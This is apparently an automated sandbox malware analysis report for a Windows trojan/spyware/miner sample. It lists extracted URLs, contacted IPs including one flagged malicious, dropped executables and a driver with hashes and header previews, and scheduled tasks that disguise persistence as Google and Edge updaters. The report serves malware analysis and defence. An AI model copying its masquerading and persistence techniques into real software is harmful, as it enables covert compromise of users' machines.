http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID	vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT	vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2006/02/addressingidentity	vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey	vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback	vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT	vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/06/addressingex	vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce	vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse	vbc.exe, 00000002.00000002.447729077.0000000006AE1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510	vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id13Response	vbc.exe, 00000002.00000002.447729077.0000000006AE1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.455691284.0000000006DA5000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd	vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif	vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed	vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1	vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1	vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty	vbc.exe, 00000002.00000002.447729077.0000000006AE1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id4y/	vbc.exe, 00000002.00000002.447729077.0000000006AE1000.00000004.00000800.00020000.00000000.sdmp	true	URL Reputation: phishing	unknown
http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct	vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement	vbc.exe, 00000002.00000002.447729077.0000000006AE1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT	vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	vbc.exe, 00000002.00000003.353833961.0000000007D71000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.454517081.0000000006D35000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.355271307.0000000007DF0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.355355297.0000000007E0D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.354438012.0000000007E56000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.353730648.0000000007D54000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.353211198.0000000007C85000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.354312159.0000000007E39000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.353109229.0000000007C68000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous	vbc.exe, 00000002.00000002.447729077.0000000006AE1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap	vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2002/12/policy	vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id22Response	vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://transfer.sh	vbc.exe, 00000002.00000002.452717577.0000000006C53000.00000004.00000800.00020000.00000000.sdmp	false		high
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search	vbc.exe, 00000002.00000003.353833961.0000000007D71000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.454517081.0000000006D35000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.355271307.0000000007DF0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.355355297.0000000007E0D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.354438012.0000000007E56000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.353730648.0000000007D54000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.353211198.0000000007C85000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.354312159.0000000007E39000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.353109229.0000000007C68000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue	vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext	vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/Issue	vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	false		high
https://search.yahoo.com?fr=crmas_sfp	vbc.exe, 00000002.00000003.353833961.0000000007D71000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.355355297.0000000007E0D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.354438012.0000000007E56000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.353211198.0000000007C85000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/spnego	vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/sc	vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id18Response	vbc.exe, 00000002.00000002.447729077.0000000006AE1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.455691284.0000000006DA5000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd	vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id3Response	vbc.exe, 00000002.00000002.447729077.0000000006AE1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/rm	vbc.exe, 00000002.00000002.447729077.0000000006AE1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.peer2profit.com/	GoogleUpdate.exe, 00000025.00000003.462000222.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.545334289.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.540360749.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.452897537.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.495329979.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.529595020.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.456448693.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.532988714.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.517766096.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.554160649.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.448795988.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.439003252.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.472364104.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.499053995.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.442019252.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.505493357.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.469489871.0000000000A41000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://studio.youtube.comSAPISIDHASH	fl.exe, 0000002B.00000000.421234279.00000000004EF000.00000002.00000001.01000000.0000000E.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
144.76.136.153	transfer.sh	Germany	24940	HETZNER-ASDE	false
51.68.171.249	unknown	France	16276	OVHFR	false
45.10.55.124	unknown	Russian Federation	48347	MTW-ASRU	true
172.66.43.60	api.peer2profit.com	United States	13335	CLOUDFLARENETUS	false
66.235.200.147	idpminic.org	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	754275
Start date and time:	2022-11-26 11:16:11 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 14m 4s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	hZDPlQwZ9D.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	68
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.mine.winEXE@99/39@5/5
EGA Information:	Successful, ratio: 40%
HDC Information:	Successful, ratio: 85.3% (good quality ratio 75.4%) Quality average: 75.7% Quality standard deviation: 33.2%
HCA Information:	Successful, ratio: 67% Number of executed functions: 75 Number of non-executed functions: 106
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.42.65.92
Excluded domains from analysis (whitelisted): client.wns.windows.com, onedsblobprdeus17.eastus.cloudapp.azure.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, watson.telemetry.microsoft.com
Execution Graph export aborted for target chrome.exe, PID 272 because there are no executed function
Execution Graph export aborted for target vbc.exe, PID 5440 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
11:17:09	API Interceptor	1x Sleep call for process: WerFault.exe modified
11:17:30	API Interceptor	161x Sleep call for process: vbc.exe modified
11:17:41	API Interceptor	1x Sleep call for process: brave.exe modified
11:17:43	Task Scheduler	Run new task: MicrosoftEdge{e60e5877-76e2-4b84-98a8-90161a4b47ca} path: C:\Users\user\AppData\Local\Google\ofg.exe
11:17:44	API Interceptor	65x Sleep call for process: powershell.exe modified
11:17:48	API Interceptor	2x Sleep call for process: chrome.exe modified
11:17:50	Task Scheduler	Run new task: GoogleUpdateTask{56c41dbe-92cb-4ab7-b423-bd40cb65f9fe} path: C:\Users\user\AppData\Local\Google\chrome.exe
11:18:02	Task Scheduler	Run new task: GoogleUpdateTaskUAC{0625ad4f-50a5-4d12-b200-288d853de0d5} path: C:\Users\user\AppData\Local\Google\chrome.exe
11:18:05	API Interceptor	20x Sleep call for process: GoogleUpdate.exe modified
11:19:00	Task Scheduler	Run new task: GoogleUpdateTaskMachineQC path: C:\Program Files\Google\Chrome\updater.exe

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Program Files\Google\Chrome\updater.exe

Download File

Process:	C:\Users\user\AppData\Local\Google\brave.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	2884609
Entropy (8bit):	7.915812566955318
Encrypted:	false
SSDEEP:	49152:xkWZLeZVfE7GQFHJUXhr3o2AmO+gpMsv6gFcPJBpaAo1AIU7LXPyPZTzeRJ38AoW:xL1eY7bFpUxr3fAjAVRJBpPAUPyBnUy6
MD5:	EB27BB8CFA99D659E4FE023E9002ECD1
SHA1:	C783400302FDFAE0518269C5A5A8D4BAD29F42A3
SHA-256:	9C01D90543458567C4737731EE6754CC209E4BB78FF648EB75C4D23BE261EF2F
SHA-512:	AB5AD3C094ED1F094AA82D80D298E6D0AB15A94B58B007DBE8A6219FE8498569B5D9013D770BD9910F177F94F2639D84650655E8F60113051E98B386C49C36A2
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 85%
Reputation:	unknown
Preview:	MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d...."Cc...............$......,................@..............................,.......,...`... .............................................. ,......`,.......+..8...........p,.............................`Z+.(....................$,.0............................text...x...........................`.P`.data.....'..0....'.................@.`..rdata..pP...0+..R....+.............@.`@.pdata...8....+..:...n+.............@.0@.xdata...1....+..2....+.............@.0@.bss..........,.......................`..idata....... ,.......+.............@.0..CRT....x....@,.......+.............@.@..tls.........P,.......+.............@.@..rsrc........`,.......+.............@.0..reloc.......p,.......,.............@.0B........................................................................................................................................................................

C:\Program Files\Google\Libs\WR64.sys

Download File

Process:	C:\Program Files\Google\Chrome\updater.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	14544
Entropy (8bit):	6.2660301556221185
Encrypted:	false
SSDEEP:	192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
MD5:	0C0195C48B6B8582FA6F6373032118DA
SHA1:	D25340AE8E92A6D29F599FEF426A2BC1B5217299
SHA-256:	11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
SHA-512:	AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.\|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..\|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_hZDPlQwZ9D.exe_4741bc54b03277606fc2b7fc259d1f376f4a1b4_a38f395c_057b1ceb\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8383123830242404
Encrypted:	false
SSDEEP:	96:r2FgjeOToI7RW6tpXIQcQvc6QcEDMcw3DL+HbHg/opAnQ0DFH0TtAi2kzbBu7Ank:6qPHBUZMXojkSq/u7s9S274It9
MD5:	CC2F25799E5E0C9EC7711AA9F3AFCAB6
SHA1:	4720491338E92EE761F448D531E67363267B5219
SHA-256:	0E4D880793142697A6C8B266822B1F14C9EFB735DAF4B73B62F1552546B43E79
SHA-512:	07DB39430D8B46327671A576AD24D7FD6D84670828622546C23D04FE3B7D72B17C9C97B7BE3DBDE7EB29718F2F7584F48FCA5D20F18C6078809AFBE3E3F0421D
Malicious:	true
Reputation:	unknown
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.1.3.9.6.3.8.2.6.7.2.0.8.9.3.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.1.3.9.6.3.8.2.7.8.7.7.1.3.2.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.c.4.6.0.7.f.3.-.5.4.2.f.-.4.5.b.6.-.8.2.2.4.-.a.3.a.f.d.6.2.7.0.9.a.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.f.9.c.b.d.f.6.-.2.4.5.b.-.4.3.c.8.-.9.4.9.0.-.9.9.3.7.1.9.3.0.2.9.3.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.h.Z.D.P.l.Q.w.Z.9.D...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.6.d.c.-.0.0.0.1.-.0.0.1.9.-.4.c.1.a.-.4.e.a.a.c.b.0.1.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.8.2.1.9.2.d.f.1.6.9.8.3.f.3.2.f.7.0.5.6.c.a.b.8.9.b.6.b.7.4.f.0.0.0.0.1.a.0.8.!.0.0.0.0.6.7.d.f.4.b.8.2.e.5.7.0.2.3.4.a.3.2.7.2.6.1.5.8.8.5.0.f.d.1.e.0.f.9.a.f.d.b.1.2.!.h.Z.D.P.l.Q.w.Z.9.D...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER122D.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Sat Nov 26 19:17:07 2022, 0x1205a4 type
Category:	dropped
Size (bytes):	43042
Entropy (8bit):	1.9396237910079281
Encrypted:	false
SSDEEP:	192:PThdo2H1m7tO6c8WzzpgY/nMJ22pPdnAyGnE57yjF2zX+OyAS:l07g6a3p3BklnJI0Al
MD5:	81FAAA7BC9050F28FEE85197097425A5
SHA1:	15977E2172FC9108549C4CCC71749F20A69DED93
SHA-256:	73536271E46275A069F16179F4750226533862F145B90E96EB2FEC3E47E1F7C1
SHA-512:	343ECCD54AAF564F98EF8B3A312B3C0EA5A4D1BCC3F77CF43D85B7DB8541AF4E1802720C161902D609A81942EEB148D697FD35EADF19B0645C719C259CE8BE0C
Malicious:	false
Reputation:	unknown
Preview:	MDMP....... .......3f.c.........................................)..........T.......8...........T...............J............................................................................................U...........B......h.......GenuineIntelW...........T.........../f.c.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1461.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8404
Entropy (8bit):	3.7018428441644735
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiII6zu6YBSZSULgmfVSTCprR489bBblsfN7jm:RrlsNi36a6YBcSULgmfVSwFBb+fx6
MD5:	C45EB2CB23DE493BD77608729BECCA64
SHA1:	6A667CBAE1E7E746979C6BAA8AB13ACBF02585D3
SHA-256:	45ADD7D6B38820FBD4AFC1C4B7A843AB26FDBE1D00A901CB997A19B3EF1E8ACD
SHA-512:	EAA3357C82AB5A66BE90D64FB8EE5C91161A9DC8715AADBF8040AF0A81504909502273E3C0E591F0AB6EE435971CCA4E75582FA4E46F3BBDCBB7F40C9B37381B
Malicious:	false
Reputation:	unknown
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.8.5.2.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER14EF.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4716
Entropy (8bit):	4.503350228728362
Encrypted:	false
SSDEEP:	48:cvIwSD8zsKJgtWI9I2Wgc8sqYj08fm8M4JWUFPMFWJ+q8vJFPVNH3mpPzd:uITfYzXgrsqY1JtlKjVNH3mpzd
MD5:	61F8F906F3607B467BBEECB06B748A04
SHA1:	1DF2C831438A5CD62BF35FB92A8095404A76B599
SHA-256:	E591DE7F7D84AD99A137E9E050185109AA7A633E6EF6F509B114E22988B8C303
SHA-512:	773FB20FEC120A4ED81EA4C4A0E0F5A2A96B84F67FB3A7CFF826B1F301E512CF48A7D5497D53EF49DB3B4CFE572B4D54D9111BCF52753B8012A8A5974B936875
Malicious:	false
Reputation:	unknown
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1797387" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\Users\user\AppData\Local\Google\brave.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	2884608
Entropy (8bit):	7.915813410181377
Encrypted:	false
SSDEEP:	49152:xkWZLeZVfE7GQFHJUXhr3o2AmO+gpMsv6gFcPJBpaAo1AIU7LXPyPZTzeRJ38AoW:xL1eY7bFpUxr3fAjAVRJBpPAUPyBnUy6
MD5:	9253ED091D81E076A3037E12AF3DC871
SHA1:	EC02829A25B3BF57AD061BBE54180D0C99C76981
SHA-256:	78E0A8309BC850037E12C2D72A5B0843DCD8B412A0A597C2A3DCBD44E9F3C859
SHA-512:	29FF2FD5F150D10B2D281A45DF5B44873192605DE8DC95278D6A7B5053370E4AC64A47100B13C63F3C048DF351A9B51F0B93AF7D922399A91508A50C152E8CF4
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 85%
Reputation:	unknown
Preview:	MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d...."Cc...............$......,................@..............................,.......,...`... .............................................. ,......`,.......+..8...........p,.............................`Z+.(....................$,.0............................text...x...........................`.P`.data.....'..0....'.................@.`..rdata..pP...0+..R....+.............@.`@.pdata...8....+..:...n+.............@.0@.xdata...1....+..2....+.............@.0@.bss..........,.......................`..idata....... ,.......+.............@.0..CRT....x....@,.......+.............@.@..tls.........P,.......+.............@.@..rsrc........`,.......+.............@.0..reloc.......p,.......,.............@.0B........................................................................................................................................................................

C:\Users\user\AppData\Local\Google\chrome.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6423552
Entropy (8bit):	7.922005336740627
Encrypted:	false
SSDEEP:	98304:Zr+dbd33oSpsJu9oR+bY11UhoIwBOqF85EiqrvBb2s4U5OoNkI9xFvPrBtOs6ha:x+BzpWu891ZDBOr+iqrpbTLp/U
MD5:	8CD1EA50F8F4C45055400E70DA52B326
SHA1:	40AF98091E8C32CE9C90502B3D851EBC231CACF9
SHA-256:	66552CBE03B205CBA08A2524FB93303DEC5EDF51188758B08D12624DB1EE73E1
SHA-512:	B0BE3ACCCF8CE64343B10E33B7CD5E7292164259D65C07E0C63C08DC05BFA0CF268290B3A37F20F6AFA81D7163BE8C90AC9AE9A7FB93C3E61CBC08310A2BEAF1
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 65%
Reputation:	unknown
